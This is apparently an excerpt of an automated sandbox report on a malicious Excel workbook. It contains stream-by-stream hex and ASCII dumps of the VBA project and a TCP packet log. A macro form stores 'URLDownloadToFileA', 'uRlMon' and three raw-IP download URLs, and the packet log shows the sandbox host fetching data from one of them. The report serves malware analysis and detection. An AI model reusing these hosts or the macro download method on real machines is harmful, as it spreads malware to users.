                          Entropy:5.27592988154
                          Base64 Encoded:True
                          Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
                          Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37
                          Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECTlk
                          File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
                          Stream Size:30
                          Entropy:1.37215976263
                          Base64 Encoded:False
                          Data ASCII:. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
                          Data Raw:01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00
                          Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                          File Type:data
                          Stream Size:116
                          Entropy:3.43722878834
                          Base64 Encoded:False
                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . . .
                          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 00 00
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
                          File Type:data
                          Stream Size:97
                          Entropy:3.61064918306
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
                          File Type:ASCII text, with CRLF line terminators
                          Stream Size:302
                          Entropy:4.65399600072
                          Base64 Encoded:True
                          Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
                          Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 226
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2/f
                          File Type:data
                          Stream Size:226
                          Entropy:3.01175231218
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 ) . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . .
                          Data Raw:00 04 20 00 08 0c 00 0c 0a 00 00 00 10 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 b4 00 00 00 00 84 01 6c 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 29 00 d4 00 00 00 d4 00 00 00 00 00 28 00 f5 01 00 00 06 00 00 80 08 00 00 00 32 00 00 00 38 00 00 00 01 00 15 00 4c 61 62 65 6c 32
                          Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 272
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2/o
                          File Type:data
                          Stream Size:272
                          Entropy:3.6318384866
                          Base64 Encoded:True
                          Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 8 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 1 8 3 . 9 6 . 6 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 2 5 0 . 1 4 8 . 2 1 3 / . . . . . . . . . . . . . 5 . . . . . . .
                          Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 38 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00
                          Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4332
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                          File Type:data
                          Stream Size:4332
                          Entropy:4.42025024054
                          Base64 Encoded:False
                          Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                          Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2461
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                          File Type:data
                          Stream Size:2461
                          Entropy:3.4974013905
                          Base64 Encoded:False
                          Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . 3 . . d . A
                          Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 03 00 00 00 00 00 01 00 02 00 03 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                          File Type:data
                          Stream Size:138
                          Entropy:1.48462480805
                          Base64 Encoded:False
                          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
                          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 6a 00 00 00 00 00
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                          File Type:data
                          Stream Size:264
                          Entropy:1.9985725068
                          Base64 Encoded:False
                          Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
                          Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                          File Type:data
                          Stream Size:256
                          Entropy:1.80540314317
                          Base64 Encoded:False
                          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                          Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1047
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/dir
                          File Type:data
                          Stream Size:1047
                          Entropy:6.66117755603
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . . . H c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
                          Data Raw:01 13 b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 cc 07 a0 48 63 06 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 28, 2021 13:16:16.038125038 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:16.225851059 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:16.226003885 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:16.226859093 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:16.414042950 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.249574900 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.249631882 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.249670029 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.249708891 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.249747038 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.249798059 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.249861002 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.249887943 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.249893904 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.249897003 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.249898911 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.249902010 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.249949932 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.249977112 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.250001907 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.250005960 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.250051975 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.250058889 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.250108957 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.258693933 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.441175938 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.441246033 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.441263914 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.441432953 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.442249060 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.456067085 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.456091881 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.456104994 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.456118107 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.456130981 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.456142902 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.456165075 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.456182957 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.456216097 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.456237078 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.456250906 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.456263065 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.456302881 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.456322908 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.456326962 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.458616018 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.629348040 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.629492044 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.663913965 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.663939953 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.663953066 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.663969040 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.663985014 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664000034 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664020061 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664036989 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664052010 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664067984 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664083958 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664098978 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664113998 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664129019 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664149046 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664154053 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.664165020 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664176941 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664189100 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664201021 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664212942 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664218903 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.664227962 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664244890 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664261103 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664269924 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.664280891 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.664313078 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.664346933 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.666522980 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.816703081 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.816869020 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.870121002 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870148897 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870172024 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870369911 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870430946 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870451927 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870475054 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870493889 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870512009 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870536089 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870558977 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870580912 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870671034 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.870697021 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.870701075 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.870722055 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.870724916 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.870727062 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.871793032 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.005440950 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.005656958 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.076637030 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076667070 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076692104 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076714993 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076739073 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076761007 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076786995 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076833963 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076858997 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076880932 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076900959 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076925039 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076931000 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.076982021 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.076992989 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.077001095 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.077006102 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.078649044 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.192809105 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.193048954 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.283693075 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283730984 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283749104 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283767939 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283792019 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283811092 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283828974 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283852100 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283875942 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283900023 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283926010 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283931971 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.283951044 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283972979 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.283979893 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.283984900 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.286262989 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.380819082 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.381134033 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.490556002 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490598917 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490617037 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490639925 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490658998 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490681887 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490700960 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490724087 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490767002 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490787029 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490808010 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490816116 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.490832090 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490854979 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490855932 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.490865946 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.490874052 CEST8049165190.14.37.178192.168.2.22
